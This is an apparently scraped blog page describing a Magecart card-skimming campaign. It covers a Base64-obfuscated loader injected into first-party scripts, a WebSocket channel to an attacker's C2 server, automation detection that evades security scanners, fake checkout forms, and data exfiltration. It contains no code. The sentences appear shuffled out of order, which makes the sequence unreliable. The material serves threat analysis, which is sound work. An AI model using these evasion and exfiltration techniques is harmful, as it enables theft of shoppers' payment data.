This message is transmitted as a Base64-encoded string, containing a one-line JavaScript command that instructs the browser to send back the current URL of the page. Once the WebSocket channel is established, the first message is sent from the attacker's C2 server to the browser. This is a clever anti-bot technique aimed at evading external security scanners and sandboxes that could potentially detect the attack. If this is the case, the code terminates its execution. This includes sending different parts of the attack from the C2 server to the browser (and vice versa), as well as facilitating data exfiltration activities in certain scenarios.Īnother noteworthy aspect of the code is bot detection, which checks if the user agent is under automation control. WebSocket is considered to be a quieter and more flexible method of communication, allowing the attacker to utilize a single network channel for various purposes. The use of WebSockets in Magecart attacks has been observed in several recent campaigns. This channel serves as a bidirectional communication link between the browser and the attacker's C2 server. Once the obfuscated Base64-encoded code is executed at runtime, it transforms into plain JavaScript and becomes responsible for initiating a WebSocket channel (Figure 3). Malicious attack code - The primary JavaScript code that executes the attack it detects sensitive inputs, reads the data, disrupts the checkout process, and injects fake formsĭata exfiltration - The method used to transmit the stolen data to the attacker's command and control (C2) server ![]() ![]() Loader - Short, obscure JavaScript code snippets responsible for loading the full malicious code of the attack Like in many other Magecart campaigns, the attack infrastructure of this campaign consists of three main parts: loader, malicious attack code, and data exfiltration (Figure 1). ![]() In some instances, the malicious code was inserted into the HTML pages in other cases, it was concealed within one of the first-party scripts that was loaded as part of the website. In this campaign, all the victim websites we detected were directly exploited, as the malicious code snippet was injected into one of their first-party resources. Magecart attacks typically begin by exploiting the vulnerabilities in the targeted websites or by infecting the third-party services that these websites are using.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |